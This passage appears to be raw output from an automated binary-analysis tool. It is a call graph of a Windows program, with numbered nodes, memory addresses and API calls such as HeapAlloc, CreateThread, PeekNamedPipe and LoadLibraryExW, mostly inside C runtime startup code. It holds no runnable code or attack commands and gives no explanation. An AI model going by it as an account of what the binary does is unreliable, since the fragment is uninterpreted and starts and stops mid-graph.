11090->11091 11090->11092 11091->11092 11092->10965 11094 27ed371908c SetLastError 11093->11094 11095 27ed3714364 11094->11095 11096 27ed3714379 HeapAlloc 11095->11096 11097 27ed371438f 11095->11097 11096->11097 11098 27ed371908c SetLastError 11097->11098 11099 27ed3712e18 11098->11099 11100 27ed3714880 11099->11100 11101 27ed371908c SetLastError 11100->11101 11102 27ed37148c0 11101->11102 11103 27ed371908c SetLastError 11102->11103 11104 27ed37148e1 HeapAlloc 11103->11104 11106 27ed3714911 11104->11106 11110 27ed3712e4c 11104->11110 11107 27ed371908c SetLastError 11106->11107 11108 27ed371492c 11107->11108 11108->11108 11109 27ed371908c SetLastError 11108->11109 11109->11110 11110->10986 11111 27ed3711bfc 11110->11111 11112 27ed3711c43 11111->11112 11113 27ed3711c4a 11111->11113 11114 27ed37147b8 SetLastError 11112->11114 11115 27ed371908c SetLastError 11113->11115 11114->11113 11118 27ed3711c58 11115->11118 11116 27ed3711cbb 11117 27ed371908c SetLastError 11116->11117 11119 27ed3711cf9 11117->11119 11118->11116 11120 27ed371240c 2 API calls 11118->11120 11121 27ed3711ed1 HeapFree 11119->11121 11168 27ed3715168 HeapAlloc 11119->11168 11120->11116 11121->10990 11121->10995 11124 27ed3711ec1 HeapFree 11124->11121 11125 27ed371908c SetLastError 11126 27ed3711d6c 11125->11126 11127 27ed3711d87 11126->11127 11128 27ed371240c 2 API calls 11126->11128 11129 27ed371908c SetLastError 11127->11129 11128->11127 11130 27ed3711da2 11129->11130 11131 27ed3711ea1 HeapFree HeapFree 11130->11131 11132 27ed371908c SetLastError 11130->11132 11131->11124 11133 27ed3711dc6 11132->11133 11134 27ed371908c SetLastError 11133->11134 11135 27ed3711de8 11134->11135 11136 27ed371240c 2 API calls 11135->11136 11138 27ed3711e07 11136->11138 11137 27ed3711e93 HeapFree 11137->11131 11138->11137 11179 27ed3716518 11138->11179 11143 27ed371a4ab 11142->11143 11145 27ed371a42b 11142->11145 11143->10990 11144 27ed371908c SetLastError 11144->11145 11145->11143 11145->11144 11146 27ed371a494 HeapFree 11145->11146 11146->11145 11148 27ed3717bb6 11147->11148 11149 27ed3712f42 11148->11149 11150 27ed37187b0 HeapAlloc 11148->11150 11149->11004 11149->11008 11151 27ed3717beb 11150->11151 11151->11149 11152 27ed3717c1c 11151->11152 11318 27ed37177b0 11151->11318 11154 27ed3717cae 11152->11154 11322 27ed3711a80 11152->11322 11157 27ed3717cc2 HeapFree 11154->11157 11156 27ed3717c5a 11158 27ed3717c79 HeapFree 11156->11158 11159 27ed3717c8e 11156->11159 11157->11149 11158->11159 11160 27ed3717ca0 HeapFree 11159->11160 11160->11154 11162 27ed371908c SetLastError 11161->11162 11163 27ed37147e6 11162->11163 11164 27ed371908c SetLastError 11163->11164 11165 27ed371480b 11163->11165 11164->11165 11166 27ed371908c SetLastError 11165->11166 11167 27ed3714854 11166->11167 11167->11008 11169 27ed3711d45 11168->11169 11176 27ed37151c3 11168->11176 11169->11124 11169->11125 11170 27ed371524b 11171 27ed3715281 11170->11171 11232 27ed37192d4 11170->11232 11241 27ed371885c 11171->11241 11176->11170 11189 27ed37130a4 11176->11189 11194 27ed3715638 11176->11194 11180 27ed371654d 11179->11180 11246 27ed3714a80 11180->11246 11182 27ed37165c9 11302 27ed3715ee8 11182->11302 11185 27ed37165b9 11185->11182 11283 27ed3712664 11185->11283 11190 27ed371908c SetLastError 11189->11190 11191 27ed37130e8 HeapAlloc 11190->11191 11193 27ed371311a 11191->11193 11193->11176 11195 27ed371908c SetLastError 11194->11195 11196 27ed3715684 11195->11196 11197 27ed371908c SetLastError 11196->11197 11198 27ed371569f 11197->11198 11199 27ed37113ec HeapAlloc SetLastError 11198->11199 11200 27ed37156e0 11199->11200 11201 27ed3715217 HeapFree 11200->11201 11202 27ed371908c SetLastError 11200->11202 11201->11170 11201->11176 11203 27ed3715703 11202->11203 11204 27ed371908c SetLastError 11203->11204 11205 27ed371571f HeapAlloc 11204->11205 11207 27ed37159d2 HeapFree 11205->11207 11209 27ed371574d 11205->11209 11207->11201 11208 27ed371a238 15 API calls 11210 27ed37157b8 11208->11210 11209->11208 11211 27ed37159c4 HeapFree 11210->11211 11212 27ed371908c SetLastError 11210->11212 11211->11207 11213 27ed37157de HeapAlloc 11212->11213 11215 27ed3715811 11213->11215 11216 27ed3715933 11213->11216 11218 27ed37113ec HeapAlloc SetLastError 11215->11218 11217 27ed37159b9 HeapFree 11216->11217 11217->11211 11219 27ed3715846 11218->11219 11220 27ed37159a8 HeapFree 11219->11220 11221 27ed3715876 HeapFree 11219->11221 11220->11216 11222 27ed3715899 11221->11222 11223 27ed37159fa 11221->11223 11222->11223 11224 27ed3717cf4 HeapAlloc HeapFree SetLastError 11222->11224 11223->11211 11225 27ed37158c5 11224->11225 11225->11220 11226 27ed37158cd HeapAlloc 11225->11226 11227 27ed37159a3 11226->11227 11228 27ed37158f4 11226->11228 11227->11220 11229 27ed37113ec HeapAlloc SetLastError 11228->11229 11230 27ed3715929 11229->11230 11230->11216 11231 27ed3715995 HeapFree 11230->11231 11231->11227 11233 27ed371908c SetLastError 11232->11233 11236 27ed3719323 11233->11236 11234 27ed37193ab HeapAlloc 11235 27ed37193d5 11234->11235 11240 27ed3719410 11234->11240 11237 27ed37193f4 HeapAlloc 11235->11237 11236->11234 11238 27ed371908c SetLastError 11236->11238 11239 27ed37194fa HeapFree 11237->11239 11237->11240 11238->11236 11239->11240 11240->11171 11242 27ed371528e HeapFree 11241->11242 11244 27ed3718860 11241->11244 11242->11169 11243 27ed3718888 HeapFree 11243->11244 11244->11242 11244->11243 11245 27ed37188a2 HeapFree 11244->11245 11245->11244 11247 27ed3714abe 11246->11247 11248 27ed3714ace 11246->11248 11249 27ed3719b88 SetLastError HeapAlloc HeapAlloc HeapFree 11247->11249 11250 27ed37131c0 HeapFree HeapFree HeapFree HeapAlloc SetLastError 11248->11250 11252 27ed3714ad2 11248->11252 11249->11248 11251 27ed3714b01 11250->11251 11251->11252 11253 27ed3714b1a 11251->11253 11254 27ed3716c34 HeapAlloc SetLastError 11251->11254 11252->11182 11252->11185 11260 27ed371204c 11252->11260 11253->11252 11255 27ed371908c SetLastError 11253->11255 11254->11253 11256 27ed3714b49 11255->11256 11257 27ed37175f8 SetLastError 11256->11257 11258 27ed3714b76 11257->11258 11258->11252 11259 27ed3714b7d HeapFree 11258->11259 11259->11252 11261 27ed3712250 11260->11261 11262 27ed371208b 11260->11262 11261->11185 11263 27ed371908c SetLastError 11262->11263 11265 27ed37120a0 11263->11265 11264 27ed3712257 11267 27ed371908c SetLastError 11264->11267 11265->11264 11266 27ed371908c SetLastError 11265->11266 11268 27ed37120c9 11266->11268 11267->11261 11268->11264 11269 27ed3712102 11268->11269 11270 27ed371908c SetLastError 11269->11270 11271 27ed371211a HeapAlloc 11270->11271 11271->11261 11273 27ed3712163 11271->11273 11274 27ed371908c SetLastError 11273->11274 11275 27ed3712171 11274->11275 11276 27ed3712222 11275->11276 11277 27ed37121a4 HeapAlloc 11275->11277 11278 27ed371908c SetLastError 11276->11278 11279 27ed37121ce 11277->11279 11282 27ed37121dc HeapFree 11277->11282 11278->11282 11281 27ed371908c SetLastError 11279->11281 11281->11282 11282->11261 11284 27ed371908c SetLastError 11283->11284 11285 27ed371269a 11284->11285 11286 27ed371282f 11285->11286 11287 27ed37126b6 11285->11287 11289 27ed371908c SetLastError 11286->11289 11288 27ed37126c0 HeapAlloc 11287->11288 11290 27ed371282a 11287->11290 11294 27ed37126e9 11288->11294 11299 27ed3712800 11288->11299 11289->11290 11290->11182 11291 27ed3712810 HeapFree 11291->11290 11292 27ed3718c6c HeapAlloc HeapFree HeapAlloc 11292->11294 11293 27ed371908c SetLastError 11293->11294 11294->11292 11294->11293 11295 27ed37127ca 11294->11295 11296 27ed37127e1 HeapFree 11294->11296 11300 27ed37127bc 11294->11300 11295->11296 11297 27ed37127f3 11296->11297 11296->11299 11298 27ed3711ef0 HeapAlloc HeapFree 11297->11298 11298->11299 11299->11290 11299->11291 11301 27ed371908c SetLastError 11300->11301 11301->11295 11303 27ed3715f0f 11302->11303 11304 27ed3715f1d 11302->11304 11305 27ed371908c SetLastError 11303->11305 11306 27ed3715f3d 11304->11306 11307 27ed371908c SetLastError 11304->11307 11305->11304 11308 27ed371908c SetLastError 11306->11308 11313 27ed3715f5d 11306->11313 11307->11306 11308->11313 11309 27ed3715f71 HeapFree 11310 27ed3715f7c 11309->11310 11311 27ed3715f90 11310->11311 11312 27ed3715f85 HeapFree 11310->11312 11314 27ed3715fa4 11311->11314 11315 27ed3715f99 HeapFree 11311->11315 11312->11311 11313->11309 11313->11310 11316 27ed3711e75 HeapFree 11314->11316 11317 27ed3715fad HeapFree 11314->11317 11315->11314 11316->11137 11317->11316 11319 27ed3717846 11318->11319 11320 27ed37177fc 11318->11320 11319->11152 11320->11319 11321 27ed371782a HeapAlloc 11320->11321 11321->11319 11323 27ed3711ac8 11322->11323 11324 27ed3711bb7 11323->11324 11325 27ed3711ae2 HeapAlloc 11323->11325 11324->11156 11325->11324 11327 27ed3711aff 11325->11327 11326 27ed3711bd3 HeapFree 11326->11324 11327->11326 11330 27ed3713cd8 11327->11330 11329 27ed3711b8c 11329->11324 11329->11326 11331 27ed371908c SetLastError 11330->11331 11332 27ed3713d15 11331->11332 11333 27ed3713d40 11332->11333 11334 27ed3713f1a 11332->11334 11336 27ed3717e40 SetLastError 11333->11336 11335 27ed371908c SetLastError 11334->11335 11338 27ed3713f0a 11335->11338 11339 27ed3713d5f 11336->11339 11337 27ed371908c SetLastError 11337->11338 11338->11329 11340 27ed371908c SetLastError 11339->11340 11349 27ed3713ef0 11339->11349 11341 27ed3713d88 11340->11341 11342 27ed371908c SetLastError 11341->11342 11343 27ed3713db5 11341->11343 11342->11343 11344 27ed371908c SetLastError 11343->11344 11345 27ed3713eb9 11343->11345 11347 27ed3713ec7 11343->11347 11343->11349 11344->11343 11346 27ed371908c SetLastError 11345->11346 11346->11347 11348 27ed371908c SetLastError 11347->11348 11348->11349 11349->11337 11351 27ed37180e9 11350->11351 11352 27ed3718017 11350->11352 11356 27ed371908c SetLastError 11351->11356 11369 27ed3718106 11351->11369 11353 27ed3718022 11352->11353 11354 27ed3718115 11352->11354 11353->11351 11355 27ed371802d 11353->11355 11357 27ed37185cc HeapAlloc 11354->11357 11361 27ed3718051 11354->11361 11359 27ed3718043 11355->11359 11355->11369 11375 27ed3718197 11355->11375 11356->11369 11376 27ed371806b 11357->11376 11358 27ed37174c6 HeapFree 11358->11012 11362 27ed37180c9 11359->11362 11363 27ed371804a 11359->11363 11360 27ed37181fb 11360->11361 11394 27ed3719214 HeapAlloc 11360->11394 11361->11358 11398 27ed3716ac0 11361->11398 11366 27ed371908c SetLastError 11362->11366 11363->11361 11377 27ed37185cc HeapAlloc 11363->11377 11364 27ed3712874 2 API calls 11367 27ed37181e9 HeapFree 11364->11367 11366->11361 11367->11360 11368 27ed37114b8 3 API calls 11372 27ed3718092 11368->11372 11369->11361 11369->11375 11379 27ed3715448 11369->11379 11372->11361 11373 27ed37180a2 HeapFree 11372->11373 11373->11361 11375->11360 11375->11361 11375->11364 11376->11361 11376->11368 11378 27ed37185ff 11377->11378 11378->11376 11380 27ed371908c SetLastError 11379->11380 11381 27ed3715492 11380->11381 11382 27ed37154c5 HeapAlloc 11381->11382 11383 27ed3715613 11382->11383 11384 27ed37154f0 11382->11384 11383->11375 11385 27ed371908c SetLastError 11384->11385 11386 27ed3715605 HeapFree 11384->11386 11387 27ed3715575 11385->11387 11386->11383 11388 27ed371908c SetLastError 11387->11388 11389 27ed37155c1 11387->11389 11392 27ed3715597 11388->11392 11389->11386 11390 27ed371908c SetLastError 11389->11390 11391 27ed37155fe 11390->11391 11391->11386 11392->11389 11393 27ed371908c SetLastError 11392->11393 11393->11389 11395 27ed371925e 11394->11395 11396 27ed37192a8 11394->11396 11413 27ed3714540 11395->11413 11396->11361 11399 27ed371908c SetLastError 11398->11399 11400 27ed3716b05 HeapAlloc 11399->11400 11402 27ed3716b33 11400->11402 11403 27ed3716bfb 11400->11403 11404 27ed371908c SetLastError 11402->11404 11403->11358 11405 27ed3716b41 11404->11405 11406 27ed371908c SetLastError 11405->11406 11407 27ed3716bb4 11406->11407 11442 27ed3718c6c 11407->11442 11409 27ed3716bd4 11410 27ed371908c SetLastError 11409->11410 11411 27ed3716be2 HeapFree 11410->11411 11411->11403 11414 27ed3714577 11413->11414 11426 27ed371456f 11413->11426 11416 27ed371908c SetLastError 11414->11416 11415 27ed3712874 HeapFree SetLastError 11417 27ed3714778 11415->11417 11418 27ed3714594 11416->11418 11419 27ed371473e 11417->11419 11420 27ed371908c SetLastError 11417->11420 11421 27ed371908c SetLastError 11418->11421 11419->11396 11420->11419 11423 27ed37145f0 11421->11423 11422 27ed371474e 11425 27ed371908c SetLastError 11422->11425 11423->11422 11424 27ed371908c SetLastError 11423->11424 11427 27ed3714626 11424->11427 11425->11426 11426->11415 11426->11419 11427->11422 11428 27ed371908c SetLastError 11427->11428 11429 27ed371465b 11428->11429 11429->11422 11430 27ed371240c HeapAlloc SetLastError 11429->11430 11431 27ed3714688 11430->11431 11432 27ed371908c SetLastError 11431->11432 11433 27ed3714699 11432->11433 11435 27ed371908c SetLastError 11433->11435 11441 27ed37146f4 11433->11441 11434 27ed3718470 SetLastError 11436 27ed3714727 11434->11436 11439 27ed37146ca 11435->11439 11436->11422 11437 27ed3714730 11436->11437 11438 27ed371908c SetLastError 11437->11438 11438->11419 11439->11422 11440 27ed371908c SetLastError 11439->11440 11440->11441 11441->11422 11441->11434 11443 27ed3718caa 11442->11443 11446 27ed3718cf7 11442->11446 11444 27ed3718cc9 HeapAlloc 11443->11444 11445 27ed3718d3a HeapAlloc 11443->11445 11444->11446 11447 27ed3718cd7 11444->11447 11445->11446 11446->11409 11448 27ed3718ce6 HeapFree 11447->11448 11448->11446 11450 27ed3715ea6 11449->11450 11454 27ed37128d1 11449->11454 11451 27ed371908c SetLastError 11450->11451 11452 27ed3715eb4 11451->11452 11453 27ed371908c SetLastError 11452->11453 11453->11454 11454->11024 11454->11026 11456 7ff88c072415 11455->11456 11464 7ff88c0724cc 11455->11464 11457 7ff88c072429 11456->11457 11463 7ff88c0725c8 11456->11463 11458 7ff88c079ac0 2 API calls 11457->11458 11460 7ff88c072457 11458->11460 11459 7ff88c07263a 11461 7ff88c072060 CreateThread 11459->11461 11462 7ff88c08f160 PeekNamedPipe 11460->11462 11461->11464 11462->11464 11463->11459 11463->11464 11464->10422 11466 7ff88c087677 11465->11466 11467 7ff88c0876c5 11465->11467 11468 7ff88c07a280 2 API calls 11466->11468 11471 7ff88c087873 11466->11471 11470 7ff88c0790b0 24 API calls 11467->11470 11467->11471 11469 7ff88c08769b 11468->11469 11469->10419 11470->11471 11471->10419 9861 7ff88c07d8ac 9862 7ff88c07d8c5 9861->9862 9870 7ff88c07d8c1 9861->9870 9873 7ff88c0805f8 9862->9873 9867 7ff88c07d8d7 9869 7ff88c07e114 __free_lconv_num 15 API calls 9867->9869 9869->9870 9874 7ff88c07d8ca 9873->9874 9875 7ff88c080605 9873->9875 9877 7ff88c080a40 GetEnvironmentStringsW 9874->9877 9912 7ff88c080440 9875->9912 9878 7ff88c080a6e WideCharToMultiByte 9877->9878 9879 7ff88c080b12 9877->9879 9878->9879 9883 7ff88c080ac8 9878->9883 9881 7ff88c080b1c FreeEnvironmentStringsW 9879->9881 9882 7ff88c07d8cf 9879->9882 9881->9882 9882->9867 9889 7ff88c07d918 9882->9889 9884 7ff88c07e154 _onexit 16 API calls 9883->9884 9885 7ff88c080ad0 9884->9885 9886 7ff88c080ad8 WideCharToMultiByte 9885->9886 9887 7ff88c080aff 9885->9887 9886->9887 9888 7ff88c07e114 __free_lconv_num 15 API calls 9887->9888 9888->9879 9890 7ff88c07d939 9889->9890 9891 7ff88c07e26c __vcrt_getptd_noexit 15 API calls 9890->9891 9900 7ff88c07d967 9891->9900 9892 7ff88c07e114 __free_lconv_num 15 API calls 9893 7ff88c07d8e4 9892->9893 9906 7ff88c07e114 9893->9906 9894 7ff88c07e26c __vcrt_getptd_noexit 15 API calls 9894->9900 9895 7ff88c07d9c7 10254 7ff88c07da14 9895->10254 9899 7ff88c07d9fe 9902 7ff88c07e5a0 _invalid_parameter_noinfo 17 API calls 9899->9902 9900->9894 9900->9895 9900->9899 9903 7ff88c07e114 __free_lconv_num 15 API calls 9900->9903 9904 7ff88c07d9d6 9900->9904 10245 7ff88c07e1b4 9900->10245 9901 7ff88c07e114 __free_lconv_num 15 API calls 9901->9904 9905 7ff88c07da10 9902->9905 9903->9900 9904->9892 9907 7ff88c07e119 HeapFree 9906->9907 9911 7ff88c07e149 __free_lconv_num 9906->9911 9908 7ff88c07e134 9907->9908 9907->9911 9909 7ff88c07e6a0 _get_daylight 13 API calls 9908->9909 9910 7ff88c07e139 GetLastError 9909->9910 9910->9911 9911->9867 9932 7ff88c07f0d4 GetLastError 9912->9932 9914 7ff88c080459 9952 7ff88c080620 9914->9952 9919 7ff88c08047c 9919->9874 9921 7ff88c07e114 __free_lconv_num 15 API calls 9921->9919 9925 7ff88c080548 9928 7ff88c080585 9925->9928 9929 7ff88c07e114 __free_lconv_num 15 API calls 9925->9929 9926 7ff88c080523 9987 7ff88c07e6a0 9926->9987 9931 7ff88c080528 9928->9931 9990 7ff88c07fefc 9928->9990 9929->9928 9931->9921 9933 7ff88c07f0f1 9932->9933 9936 7ff88c07f0f6 9932->9936 9997 7ff88c07f5bc 9933->9997 9938 7ff88c07f13f 9936->9938 10002 7ff88c07e26c 9936->10002 9940 7ff88c07f15a SetLastError 9938->9940 9941 7ff88c07f144 SetLastError 9938->9941 9939 7ff88c07f115 9945 7ff88c07e114 __free_lconv_num 15 API calls 9939->9945 10019 7ff88c07e214 9940->10019 9941->9914 9948 7ff88c07f11c 9945->9948 9946 7ff88c07f133 10014 7ff88c07ee40 9946->10014 9948->9940 9953 7ff88c07f0d4 abort 36 API calls 9952->9953 9954 7ff88c08062f 9953->9954 9955 7ff88c08064a 9954->9955 10150 7ff88c07f2b0 EnterCriticalSection 9954->10150 9960 7ff88c07e214 abort 36 API calls 9955->9960 9961 7ff88c080462 9955->9961 9960->9961 9963 7ff88c08014c 9961->9963 10151 7ff88c07e2e4 9963->10151 9966 7ff88c08017e 9968 7ff88c080183 GetACP 9966->9968 9969 7ff88c080193 9966->9969 9967 7ff88c08016c GetOEMCP 9967->9969 9968->9969 9969->9919 9970 7ff88c07e154 9969->9970 9971 7ff88c07e19f 9970->9971 9972 7ff88c07e163 __vcrt_getptd_noexit 9970->9972 9973 7ff88c07e6a0 _get_daylight 15 API calls 9971->9973 9972->9971 9974 7ff88c07e186 RtlAllocateHeap 9972->9974 9976 7ff88c080f5c __vcrt_getptd_noexit 2 API calls 9972->9976 9975 7ff88c07e19d 9973->9975 9974->9972 9974->9975 9975->9931 9977 7ff88c0806e0 9975->9977 9976->9972 9978 7ff88c08014c 38 API calls 9977->9978 9979 7ff88c08070d 9978->9979 9980 7ff88c080715 9979->9980 9981 7ff88c080757 IsValidCodePage 9979->9981 9985 7ff88c08077d __scrt_fastfail 9979->9985 9983 7ff88c086d80 _handle_error 8 API calls 9980->9983 9981->9980 9982 7ff88c080768 GetCPInfo 9981->9982 9982->9980 9982->9985 9984 7ff88c08051c 9983->9984 9984->9925 9984->9926 10179 7ff88c08025c GetCPInfo 9985->10179 9988 7ff88c07f168 _get_daylight 15 API calls 9987->9988 9989 7ff88c07e6a9 9988->9989 9989->9931 10244 7ff88c07f2b0 EnterCriticalSection 9990->10244 10028 7ff88c07f320 9997->10028 10000 7ff88c07f5fe TlsGetValue 10001 7ff88c07f5ef 10000->10001 10001->9936 10003 7ff88c07e27d __vcrt_getptd_noexit 10002->10003 10004 7ff88c07e2b2 HeapAlloc 10003->10004 10005 7ff88c07e2ce 10003->10005 10037 7ff88c080f5c 10003->10037 10004->10003 10007 7ff88c07e2cc 10004->10007 10006 7ff88c07e6a0 _get_daylight 14 API calls 10005->10006 10006->10007 10007->9939 10009 7ff88c07f614 10007->10009 10010 7ff88c07f320 __vcrt_uninitialize_ptd 5 API calls 10009->10010 10011 7ff88c07f647 10010->10011 10012 7ff88c07f661 TlsSetValue 10011->10012 10013 7ff88c07f12c 10011->10013 10012->10013 10013->9939 10013->9946 10046 7ff88c07edc0 10014->10046 10060 7ff88c081018 10019->10060 10029 7ff88c07f37c 10028->10029 10035 7ff88c07f381 10028->10035 10030 7ff88c07f3a9 LoadLibraryExW 10029->10030 10034 7ff88c07f42e 10029->10034 10029->10035 10036 7ff88c07f413 FreeLibrary 10029->10036 10030->10029 10031 7ff88c07f3ca GetLastError 10030->10031 10031->10029 10033 7ff88c07f3d5 LoadLibraryExW 10031->10033 10032 7ff88c07f43c GetProcAddress 10032->10035 10033->10029 10034->10032 10034->10035 10035->10000 10035->10001 10036->10029 10040 7ff88c080f9c 10037->10040 10045 7ff88c07f2b0 EnterCriticalSection 10040->10045 10058 7ff88c07f2b0 EnterCriticalSection 10046->10058 10094 7ff88c080fd0 10060->10094 10099 7ff88c07f2b0 EnterCriticalSection 10094->10099 10152 7ff88c07e2ff 10151->10152 10153 7ff88c07e2fa 10151->10153 10152->10153 10154 7ff88c07f0d4 abort 36 API calls 10152->10154 10153->9966 10153->9967 10155 7ff88c07e31c 10154->10155 10159 7ff88c08165c 10155->10159 10160 7ff88c081671 10159->10160 10162 7ff88c07e340 10159->10162 10160->10162 10167 7ff88c082b60 10160->10167 10163 7ff88c081690 10162->10163 10164 7ff88c0816b8 10163->10164 10165 7ff88c0816a5 10163->10165 10164->10153 10165->10164 10166 7ff88c080620 36 API calls 10165->10166 10166->10164 10168 7ff88c07f0d4 abort 36 API calls 10167->10168 10169 7ff88c082b6f 10168->10169 10171 7ff88c082bc1 10169->10171 10178 7ff88c07f2b0 EnterCriticalSection 10169->10178 10171->10162 10180 7ff88c0802a5 10179->10180 10188 7ff88c080385 10179->10188 10189 7ff88c083370 10180->10189 10183 7ff88c086d80 _handle_error 8 API calls 10185 7ff88c080429 10183->10185 10185->9980 10187 7ff88c083880 41 API calls 10187->10188 10188->10183 10190 7ff88c07e2e4 36 API calls 10189->10190 10191 7ff88c0833b2 MultiByteToWideChar 10190->10191 10193 7ff88c0833f7 10191->10193 10194 7ff88c0833f0 10191->10194 10195 7ff88c083425 __scrt_fastfail 10193->10195 10196 7ff88c07e154 _onexit 16 API calls 10193->10196 10197 7ff88c086d80 _handle_error 8 API calls 10194->10197 10199 7ff88c083495 MultiByteToWideChar 10195->10199 10200 7ff88c0834d0 10195->10200 10196->10195 10198 7ff88c080319 10197->10198 10203 7ff88c083880 10198->10203 10199->10200 10201 7ff88c0834b6 GetStringTypeW 10199->10201 10200->10194 10202 7ff88c07e114 __free_lconv_num 15 API calls 10200->10202 10201->10200 10202->10194 10204 7ff88c07e2e4 36 API calls 10203->10204 10205 7ff88c0838a5 10204->10205 10208 7ff88c083524 10205->10208 10209 7ff88c083566 10208->10209 10210 7ff88c08358a MultiByteToWideChar 10209->10210 10211 7ff88c0835bc 10210->10211 10212 7ff88c083835 10210->10212 10215 7ff88c07e154 _onexit 16 API calls 10211->10215 10217 7ff88c0835f4 10211->10217 10213 7ff88c086d80 _handle_error 8 API calls 10212->10213 10214 7ff88c08034c 10213->10214 10214->10187 10215->10217 10216 7ff88c083658 MultiByteToWideChar 10218 7ff88c08367e 10216->10218 10221 7ff88c083709 10216->10221 10217->10216 10217->10221 10235 7ff88c07f6f4 10218->10235 10221->10212 10222 7ff88c07e114 __free_lconv_num 15 API calls 10221->10222 10222->10212 10223 7ff88c083718 10226 7ff88c083743 10223->10226 10227 7ff88c07e154 _onexit 16 API calls 10223->10227 10224 7ff88c0836c6 10224->10221 10225 7ff88c07f6f4 6 API calls 10224->10225 10225->10221 10226->10221 10228 7ff88c07f6f4 6 API calls 10226->10228 10227->10226 10229 7ff88c0837d6 10228->10229 10230 7ff88c08380c 10229->10230 10231 7ff88c083800 WideCharToMultiByte 10229->10231 10230->10221 10232 7ff88c07e114 __free_lconv_num 15 API calls 10230->10232 10231->10230 10233 7ff88c08386c 10231->10233 10232->10221 10233->10221 10234 7ff88c07e114 __free_lconv_num 15 API calls 10233->10234 10234->10221 10236 7ff88c07f320 __vcrt_uninitialize_ptd 5 API calls 10235->10236 10237 7ff88c07f737 10236->10237 10240 7ff88c07f73f 10237->10240 10241 7ff88c07f7e4 10237->10241 10239 7ff88c07f7a0 LCMapStringW 10239->10240 10240->10221 10240->10223 10240->10224 10242 7ff88c07f320 __vcrt_uninitialize_ptd 5 API calls 10241->10242 10243 7ff88c07f817 10242->10243 10243->10239 10246 7ff88c07e1cb 10245->10246 10247 7ff88c07e1c1 10245->10247 10248 7ff88c07e6a0 _get_daylight 15 API calls 10246->10248 10247->10246 10252 7ff88c07e1e6 10247->10252 10249 7ff88c07e1d2 10248->10249 10250 7ff88c07e580 _invalid_parameter_noinfo 32 API calls 10249->10250 10251 7ff88c07e1de 10250->10251 10251->9900 10252->10251 10253 7ff88c07e6a0 _get_daylight 15 API calls 10252->10253 10253->10249 10255 7ff88c07da19 10254->10255 10256 7ff88c07d9cf 10254->10256 10257 7ff88c07da42 10255->10257 10259 7ff88c07e114 __free_lconv_num 15 API calls 10255->10259 10256->9901 10258 7ff88c07e114 __free_lconv_num 15 API calls 10257->10258 10258->10256 10259->10255 11472 7ff88c07b5a0 11473 7ff88c07b5c6 11472->11473 11474 7ff88c07b5dd dllmain_raw 11473->11474 11475 7ff88c07b5ce 11473->11475 11481 7ff88c07b5fd 11473->11481 11474->11475 11476 7ff88c07b5f0 11474->11476 11485 7ff88c07b3a0 11476->11485 11478 7ff88c07b64a 11478->11475 11479 7ff88c07b3a0 62 API calls 11478->11479 11480 7ff88c07b660 11479->11480 11480->11475 11482 7ff88c07b66a dllmain_raw 11480->11482 11481->11475 11481->11478 11483 7ff88c07b3a0 62 API calls 11481->11483 11482->11475 11484 7ff88c07b63d dllmain_raw 11483->11484 11484->11478 11486 7ff88c07b3a8 11485->11486 11495 7ff88c07b3e1 __scrt_acquire_startup_lock 11485->11495 11487 7ff88c07b3ad 11486->11487 11488 7ff88c07b3d5 11486->11488 11489 7ff88c07b3c8 __scrt_dllmain_crt_thread_attach 11487->11489 11490 7ff88c07b3b2 11487->11490 11517 7ff88c07b89c 11488->11517 11494 7ff88c07b3c6 11489->11494 11493 7ff88c07b3b7 11490->11493 11532 7ff88c07b7dc 11490->11532 11491 7ff88c07b53a 11491->11481 11493->11481 11494->11481 11495->11491 11497 7ff88c07b565 11495->11497 11498 7ff88c07bc0c __scrt_fastfail 6 API calls 11495->11498 11544 7ff88c07b858 11497->11544 11498->11497 11500 7ff88c07b56a 11549 7ff88c07b888 11500->11549 11501 7ff88c07b412 __scrt_acquire_startup_lock 11503 7ff88c07b43e 11501->11503 11508 7ff88c07b416 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 11501->11508 11537 7ff88c07bc0c 11501->11537 11525 7ff88c07b79c 11503->11525 11504 7ff88c07b575 __scrt_release_startup_lock 11554 7ff88c07ba74 11504->11554 11508->11481 11509 7ff88c07b44d _RTC_Initialize 11509->11508 11528 7ff88c07baf0 11509->11528 11513 7ff88c07b467 11514 7ff88c07baf0 35 API calls 11513->11514 11515 7ff88c07b473 __scrt_initialize_default_local_stdio_options 11514->11515 11515->11508 11516 7ff88c07b48f __scrt_dllmain_after_initialize_c 11515->11516 11516->11508 11518 7ff88c07b8be __isa_available_init 11517->11518 11558 7ff88c07c7dc 11518->11558 11521 7ff88c07b8c7 11521->11501 11645 7ff88c07b8e8 11525->11645 11527 7ff88c07b7a7 11527->11509 11650 7ff88c07baa0 11528->11650 11530 7ff88c07b462 11531 7ff88c07bbb4 InitializeSListHead 11530->11531 11665 7ff88c07e0b8 11532->11665 11538 7ff88c07bc2d __scrt_fastfail 11537->11538 11539 7ff88c07bc4d RtlCaptureContext RtlLookupFunctionEntry 11538->11539 11540 7ff88c07bc76 RtlVirtualUnwind 11539->11540 11541 7ff88c07bcb2 __scrt_fastfail 11539->11541 11540->11541 11542 7ff88c07bce4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11541->11542 11543 7ff88c07bd36 11542->11543 11543->11503 11545 7ff88c07b861 __scrt_initialize_onexit_tables 11544->11545 11547 7ff88c07b875 11545->11547 11736 7ff88c07db0c 11545->11736 11547->11500 11744 7ff88c07e0dc 11549->11744 11552 7ff88c07ca7c __vcrt_uninitialize_ptd 6 API calls 11553 7ff88c07c861 11552->11553 11553->11504 11555 7ff88c07ba85 __scrt_uninitialize_crt 11554->11555 11556 7ff88c07ba97 11555->11556 11557 7ff88c07c838 __vcrt_uninitialize 8 API calls 11555->11557 11556->11491 11557->11556 11559 7ff88c07c7e5 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 11558->11559 11578 7ff88c07caa0 11559->11578 11562 7ff88c07b8c3 11562->11521 11566 7ff88c07e090 11562->11566 11568 7ff88c080e70 11566->11568 11567 7ff88c07b8d0 11567->11521 11570 7ff88c07c838 11567->11570 11568->11567 11629 7ff88c080df4 11568->11629 11571 7ff88c07c851 11570->11571 11572 7ff88c07c840 11570->11572 11571->11521 11573 7ff88c07ca7c __vcrt_uninitialize_ptd 6 API calls 11572->11573 11574 7ff88c07c845 11573->11574 11575 7ff88c07cae8 __vcrt_uninitialize_locks DeleteCriticalSection 11574->11575 11576 7ff88c07c84a 11575->11576 11641 7ff88c07cf10 11576->11641 11581 7ff88c07caa8 11578->11581 11580 7ff88c07cad9 11583 7ff88c07cae8 __vcrt_uninitialize_locks DeleteCriticalSection 